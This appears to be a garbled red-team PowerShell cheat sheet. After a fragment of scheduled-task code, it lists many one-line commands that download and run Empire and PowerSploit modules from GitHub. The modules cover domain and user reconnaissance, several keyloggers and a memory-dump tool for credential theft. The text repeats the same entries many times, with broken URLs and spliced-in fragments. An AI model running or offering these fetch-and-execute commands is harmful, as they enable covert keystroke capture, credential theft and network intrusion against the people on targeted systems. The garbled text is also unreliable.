$Folder.RegisterTaskDefinition ($TaskName , $Task , 6 , " " , " " , 3 )
}
END {
Write-Output " [+] Process Completed" function Convert-Date {
param (
[datetime ]$Date
)
PROCESS {
$Date.Touniversaltime ().tostring(" u" -replace " " , " T" # Recommend Get-ComHijack// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-ComHijack.ps1 );Get-ComHijack # Recommend Get-ComHijackProperty// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-ComHijackProperty.ps1 );Get-ComHijackProperty Red Teaming PowerShell Frameworks & Toolz # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetUser.ps1 );Get-NetUser
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetUser.ps1 );Get-NetUser # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetComputer.ps1 );Get-NetComputer
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetComputer.ps1 );Get-NetComputer # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetGroup.ps1 );Get-NetGroup
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetGroup.ps1 );Get-NetGroup # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetShare.ps1 );Get-NetShare
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetShare.ps1 );Get-NetShare # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetFileSystem.ps1 );Get-NetFileSystem
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetFileSystem.ps1 );Get-NetFileSystem
# Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetUser.ps1 );Get-NetUser
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetUser.ps1 );Get-NetUser # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetDomain.ps1 );Get-NetDomain
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetDomain.ps1 );Get-NetDomain # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetComputer.ps1 );Get-NetComputer
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetComputer.ps1 );Get-NetComputer # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetGroup.ps1 );Get-NetGroup
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetGroup.ps1 );Get-NetGroup # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetLocalGroup.ps1 );Get-NetLocalGroup
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetLocalGroup.ps1 );Get-NetLocalGroup # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetLoggedOn.ps1 );Get-NetLoggedOn
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetLoggedOn.ps1 );Get-NetLoggedOn # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetOU.ps1 );Get-NetOU
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetOU.ps1 );Get-NetOU # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetUser.ps1 );Get-NetUser
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetUser.ps1 );Get-NetUser # Recommend Get-NetUserSession// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetUserSession.ps1 );Get-NetUserSession
# Not recommend Get-NetUserSession// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetUserSession.ps1 );Get-NetUserSession # Recommend Get-NetGroup// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetGroup.ps1 );Get-NetGroup
# Not recommend Get-NetGroup// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetGroup.ps1 );Get-NetGroup # Recommend Get-NetGroupUser# ### Get-NetShare`` ` powershell
# Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetShare.ps1 );Get-NetShare
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetShare.ps1 );Get-NetShare # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetFileSystem.ps1 );Get-NetFileSystem
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetFileSystem.ps1 );Get-NetFileSystem
# Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetUser.ps1 );Get-NetUser
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetUser.ps1 );Get-NetUser # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetDomain.ps1 );Get-NetDomain
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetDomain.ps1 );Get-NetDomain # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetComputer.ps1 );Get-NetComputer
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetComputer.ps1 );Get-NetComputer # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetGroup.ps1 );Get-NetGroup
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetGroup.ps1 );Get-NetGroup # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetLocalGroup.ps1 );Get-NetLocalGroup
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetLocalGroup.ps1 );Get-NetLocalGroup # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetLoggedOn.ps1 );Get-NetLoggedOn
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetLoggedOn.ps1 );Get-NetLoggedOn # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetOU.ps1 );Get-NetOU
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetOU.ps1 );Get-NetOU # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetUser.ps1 );Get-NetUser
# Not recommend// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetUser.ps1 );Get-NetUser # Recommend Get-NetUserSession// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetUserSession.ps1 );Get-NetUserSession
# Not recommend Get-NetUserSession// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetUserSession.ps1 );Get-NetUserSession # Recommend Get-NetDomain// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetDomain.ps1 );Get-NetDomain
# Not recommend Get-NetDomain// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetDomain.ps1 );Get-NetDomain # Recommend Get-NetDomainController// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetDomainController.ps1 );Get-NetDomainController
# Not recommend Get-NetDomainController// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetDomainController.ps1 );Get-NetDomainController # Recommend Get-NetComputer// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-NetComputer.ps1 );Get-NetComputer
# Not recommend Get-NetComputer// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-NetComputer.ps1 );Get-NetComputer External PowerShell t00lize # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ collection/ Get-Keystrokes.ps1 );Get-Keystrokes
iex (iwr https:// gist.githubusercontent.com / andreafortuna/ c807ffd46820c60c78ee955a19dc1f80/ raw/ bc48844fcc61ca52855caf65bcd9f17960e468bd/ KeyLogger.ps1);Test-KeyLogger
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Keylogger.ps1);Keylogger
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Exfiltration/ Out-Minidump.ps1 );Out-Minidump
iex (iwr https:// raw.githubusercontent.com / BankSecurity/ Red_Team/ master/ Discovery/ Keylogger.ps1);Invoke-Keylogger
# Not recommend// raw.githubusercontent.com / vacmf/ powershell- scripts/ master/ powershell- keylogger.ps1);KeyLog
iex (iwr https:// raw.githubusercontent.com / lazywinadmin/ PowerShell/ master/ TOOL- Start-KeyLogger / Start-KeyLogger.ps1 );Start-KeyLogger
powershell.exe " IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1'); Get-Keystrokes -LogPath C:\windows\temp\key.log -Timeout 20" 